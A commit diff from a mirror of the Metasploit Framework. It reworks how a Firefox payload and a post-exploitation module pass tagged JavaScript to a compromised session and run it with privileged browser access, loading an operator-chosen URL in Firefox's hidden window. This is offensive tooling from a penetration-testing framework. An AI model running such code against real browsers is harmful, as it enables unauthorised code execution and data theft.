mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-29 18:07:27 +01:00
Use shell primitives instead of resorting to
echo hacks.
This commit is contained in:
parent
4329e5a21e
commit
f2f68a61aa
@ -47,7 +47,7 @@ module Msf::Payload::Firefox
|
||||
# redirects stdout. A JScript "launch" file is dropped and invoked with wscript
|
||||
# to run the command without displaying the cmd.exe prompt.
|
||||
#
|
||||
# When the command contains the pattern ",JAVASCRIPT, ... ,ENDSCRIPT,", the
|
||||
# When the command contains the pattern "[JAVASCRIPT] ... [/JAVASCRIPT]", the
|
||||
# javascript code between the tags is eval'd and returned.
|
||||
#
|
||||
# @return [String] javascript source code that exposes the runCmd(str) method.
|
||||
@ -59,18 +59,12 @@ module Msf::Payload::Firefox
|
||||
var svcs = Components.utils.import("resource://gre/modules/Services.jsm");
|
||||
var jscript = (#{JSON.unparse({:src => jscript_launcher})}).src;
|
||||
var runCmd = function(cmd, cb) {
|
||||
var echo = function(str) {
|
||||
if(!str \|\| !str.length) return '';
|
||||
var e = str.match(/echo ['"]?([^;\\s"']+)/);
|
||||
return (e && e[1]) \|\| '';
|
||||
}
|
||||
var js = (/,JAVASCRIPT,([\\s\\S]*),ENDSCRIPT,/g).exec(cmd.trim());
|
||||
if (cmd.trim().length == 0) return;
|
||||
|
||||
var js = (/^\\s*\\[JAVASCRIPT\\]([\\s\\S]*)\\[\\/JAVASCRIPT\\]/g).exec(cmd.trim());
|
||||
if (js) {
|
||||
var wcmd = (windows) ? cmd+"\\n" : '';
|
||||
var cmds = cmd.split(js[0]).map(function(s){return s.trim().replace(/^\\s*;/, "")});
|
||||
Function('cb', js[1])(function(r) {
|
||||
cb(wcmd+echo(cmds[0])+"\\n"+r+"\\n"+echo(cmds[1]))
|
||||
})
|
||||
var tag = "[!JAVASCRIPT]";
|
||||
Function('send', js[1])(function(r){ if (r) cb(r+tag+"\\n"); });
|
||||
return;
|
||||
}
|
||||
|
||||
|
@ -35,7 +35,8 @@ class Metasploit3 < Msf::Post
|
||||
end
|
||||
|
||||
def run
|
||||
results = cmd_exec(",JAVASCRIPT,#{js_payload},ENDSCRIPT,", nil, datastore['TIMEOUT'])
|
||||
session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")
|
||||
results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
|
||||
|
||||
if results.present?
|
||||
print_good results
|
||||
@ -48,15 +49,15 @@ class Metasploit3 < Msf::Post
|
||||
js = datastore['SCRIPT'].strip
|
||||
%Q|
|
||||
|
||||
(function(){
|
||||
(function(send){
|
||||
var hiddenWindow = Components.classes["@mozilla.org/appshell/appShellService;1"]
|
||||
.getService(Components.interfaces.nsIAppShellService)
|
||||
.hiddenDOMWindow;
|
||||
|
||||
hiddenWindow.location = 'about:blank';
|
||||
var src = (#{JSON.unparse({ :src => js })}).src;
|
||||
var XHR = hiddenWindow.XMLHttpRequest;
|
||||
var key = "#{Rex::Text.rand_text_alphanumeric(8+rand(12))}";
|
||||
|
||||
hiddenWindow[key] = true;
|
||||
hiddenWindow.location = "#{datastore['URL']}";
|
||||
|
||||
@ -65,7 +66,11 @@ class Metasploit3 < Msf::Post
|
||||
schedule(evt);
|
||||
} else {
|
||||
schedule(function(){
|
||||
cb(hiddenWindow.Function(src)());
|
||||
try {
|
||||
send(hiddenWindow.Function('send', src)(send));
|
||||
} catch (e) {
|
||||
send("Error: "+e.message);
|
||||
}
|
||||
}, 500);
|
||||
}
|
||||
};
|
||||
@ -77,7 +82,7 @@ class Metasploit3 < Msf::Post
|
||||
};
|
||||
|
||||
schedule(evt);
|
||||
})();
|
||||
})(send);
|
||||
|
||||
|.strip
|
||||
end
|
||||
|
Loading…
Reference in New Issue
Block a user